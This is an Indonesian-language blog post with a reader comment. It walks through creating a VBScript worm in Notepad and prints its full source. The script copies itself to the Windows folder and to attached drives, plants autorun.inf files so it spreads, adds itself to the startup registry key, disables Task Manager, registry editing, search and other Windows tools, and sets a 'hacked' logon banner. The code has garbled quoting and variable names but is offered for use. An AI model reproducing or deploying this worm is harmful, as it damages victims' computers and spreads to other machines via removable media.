Setiap virus memiliki karakter masing - masing, karakter tersebut bisa dibedakan dari cara menyerang maupun ekstensi virus tersebut. Kali ini saya akan membahas virus berekstensi VBS yang menggunakan Windows Script Host. Skript tersebut dapat dibuat dengan aplikasi sederhana, yaitu Notepad. Berikut cara pembuatannya:
1. Buka Notepad
2. Copy dan Paste skript Berikut:
------------------------------Skript------------------------------
on error resume next
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,Hx,nt,check,sd
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs” set fs = createobject(”Scripting.FileSystemObject”) set mf = fs.getfile(Wscript.ScriptFullname) dim text,size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream(1,-2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbcrlf loop do
Set windowpath = fs.getspecialfolder(0) set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 32 set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true) tf.write rekursif tf.close set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “) tf.attributes = 39
for each flashdrive in fs.drives If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes =32 set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true) tf.write rekursif tf.close set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “) tf.attributes = 39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes = 32 set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true) tf.write isi tf.close set tf = fs.getfile(flashdrive.path &”\autorun.inf”) tf.attributes=39 end if next
set Hx = createobject(”WScript.Shell”)
Hx.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” HxHacker “
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD” Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
Hx.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Hx . your computer now is hacked by zeke hack.”
Hx.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix” Hx.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Hx ”
if check <> 1 then Wscript.sleep 200000 end if loop while check <> 1 set sd = createobject(”Wscript.shell”) sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
---------------------------akhir skript---------------------------
3. Save as, ubah save as type menjadi "all files", simpan dengan format ".vbs", misal Hx.vbs.
Zeke hack {Trickster}
1 komentar:
gan, ini kalau di open kompi nya bisa eror semua?
kalau cuma disimpen gpp kan?
Posting Komentar